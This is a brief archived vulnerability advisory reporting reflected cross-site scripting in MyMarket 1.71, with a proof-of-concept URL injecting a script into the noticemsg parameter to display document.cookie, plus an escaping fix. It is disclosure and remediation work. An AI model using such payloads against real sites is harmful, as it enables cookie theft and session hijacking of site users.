+----------------------+
| XSS in MyMarket 1.71 |
+----------------------+
Product Description
===================
MyMarket is a fully functional online shopping catalog system, built using
PHP and MySQL. It was created by Ying Zhang for the purpose of teaching
people about the basics of creating an E-Commerce site. It can be found at
http://mymarket.sourceforge.net/
Vulnerable systems
==================
MyMarket 1.71
Exploit
=======
http://[traget]/templates/form_header.php?noticemsg=<Scr*ipt>javascript:aler
t(document.cookie)</Scr*ipt>
(without "*")
Solution
========
put this two lines at the begin of form_header.php
---- form_header.php -----
<?
$noticemsg = HTMLSpecialChars($noticemsg);
$errormsg = HTMLSpecialChars($errormsg);
...
--------------------------
Vendor response
===============
I submitted this a week ago, the vendor didn't response yet.
------------------------------
Tim Vandermeersch
qber66@pandora.be
http://users.pandora.be/tim/
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
